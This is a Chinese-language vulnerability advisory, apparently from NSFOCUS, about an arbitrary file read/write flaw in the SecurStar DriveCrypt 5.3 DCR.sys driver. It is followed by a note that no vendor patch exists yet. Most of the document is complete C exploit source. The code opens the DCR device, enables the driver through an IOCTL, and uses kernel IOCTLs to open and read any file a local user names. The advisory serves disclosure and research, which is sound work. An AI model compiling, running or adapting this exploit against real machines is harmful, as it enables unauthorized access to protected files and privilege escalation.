安全研究
安全漏洞
DriveCrypt "DCR.sys"任意文件读写本地权限提升漏洞
发布日期:2011-01-11
更新日期:2011-01-13
受影响系统:
SecurStar DriveCrypt 5.3描述:
BUGTRAQ ID: 45750
DriveCrypt是可保护笔记本和台式机上的所有数据的软件。
DriveCrypt的DCR.sys驱动实现上存在漏洞,本地攻击者可利用此漏洞读写任意文件,从而完全控制受影响的计算机。
<*来源:Neil Kettle (mu-b@65535.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* DriveCrypt <= 5.3 local kernel arbitrary file read/write exploit
* by mu-b - Sun 16 Aug 2009
*
* - Tested on: DCR.sys
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ddk/ntapi.h>
#define DCR_IOCTL 0x00073800
struct ioctl_enable_req {
DWORD dAction;
DWORD dFlag;
UCHAR pad[0x20];
PUCHAR lpVerBuffer;
} lpRequest;
static DWORD
dcrypt_ZwCreateFile (HANDLE hDrv, const PUCHAR lpFileName, HANDLE *hFile)
{
struct ioctl_open_req {
DWORD dAction;
DWORD dFlag;
PUCHAR lpFileName;
UCHAR pad[0x0C];
HANDLE *hFile;
UCHAR _pad[0x0C];
PUCHAR lpVerBuffer;
} lpRequest;
UCHAR lpFileBuffer[256], lpVerBuffer[256];
DWORD dReturnLen;
BOOL bResult;
snprintf (lpFileBuffer, sizeof lpFileBuffer, "\\??\\%s", lpFileName);
memset (&lpRequest, 0, sizeof lpRequest);
lpRequest.dAction = 63;
lpRequest.dFlag = 0;
lpRequest.lpFileName = lpFileBuffer;
lpRequest.hFile = hFile;
lpRequest.lpVerBuffer = lpVerBuffer;
#ifdef _DEBUG_
printf ("* opening file...\n");
#endif
bResult = DeviceIoControl (hDrv, DCR_IOCTL,
&lpRequest, sizeof lpRequest,
&lpRequest, sizeof lpRequest, &dReturnLen, 0);
if (!bResult)
{
return (-1);
}
#ifdef _DEBUG_
printf ("** file: %s, handle: %08X\n", lpFileBuffer, *hFile);
printf ("* done\n");
#endif
return (0);
}
static HANDLE
dcrypt_ZwReadFile (HANDLE hDrv, HANDLE hFile, PCHAR lpBuf, DWORD dLen, DWORD offset)
{
struct read_opts {
HANDLE hFile;
UCHAR pad[0x4];
LARGE_INTEGER offset;
PUCHAR lpBuf;
UCHAR _pad[0x4];
DWORD dLen;
DWORD dAction;
DWORD zero;
DWORD dRlen;
} lpOpts;
struct ioctl_open_req {
DWORD dAction;
DWORD dFlag;
struct read_opts *lpOpts;
UCHAR pad[0x10];
UCHAR _pad[0x0C];
PUCHAR lpVerBuffer;
} lpRequest;
UCHAR lpVerBuffer[256];
DWORD dReturnLen;
BOOL bResult;
memset (&lpOpts, 0, sizeof lpOpts);
lpOpts.hFile = hFile;
lpOpts.offset.LowPart = offset;
lpOpts.lpBuf = lpBuf;
lpOpts.dLen = dLen;
lpOpts.dAction = 0;
memset (&lpRequest, 0, sizeof lpRequest);
lpRequest.dAction = 64;
lpRequest.dFlag = 0;
lpRequest.lpOpts = &lpOpts;
lpRequest.lpVerBuffer = lpVerBuffer;
#ifdef _DEBUG_
printf ("* reading from file...\n");
#endif
bResult = DeviceIoControl (hDrv, DCR_IOCTL,
&lpRequest, sizeof lpRequest,
&lpRequest, sizeof lpRequest, &dReturnLen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
#ifdef _DEBUG_
printf ("** read: %.*s [%d-bytes]\n", lpOpts.dRlen, lpBuf, lpOpts.dRlen);
printf ("* done\n");
#endif
return (hFile);
}
int
main (int argc, char **argv)
{
struct ioctl_enable_req req;
CHAR buf[1024], filebuf[256], readbuf[256];
HANDLE hFile, hReadFile;
DWORD rlen;
BOOL result;
printf ("DriveCrypt <= 5.3 local kernel arbitrary file read/write exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
hFile = CreateFileA ("\\\\.\\DCR", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (&req, 0, sizeof req);
req.dAction = 0x153;
req.dFlag = 0;
req.lpVerBuffer = buf;
printf ("* enabling driver...\n");
result = DeviceIoControl (hFile, DCR_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("** version: 0x%08X [%s], %s\n", *(int *) &buf[8], &buf[12], &buf[19]);
printf ("* done\n");
dcrypt_ZwCreateFile (hFile, argv[1], &hReadFile);
dcrypt_ZwReadFile (hFile, hReadFile, readbuf, 256, 0);
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
建议:
厂商补丁:
SecurStar
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.securstar.com/
浏览次数:2637
严重程度:0(网友投票)
绿盟科技给您安全的保障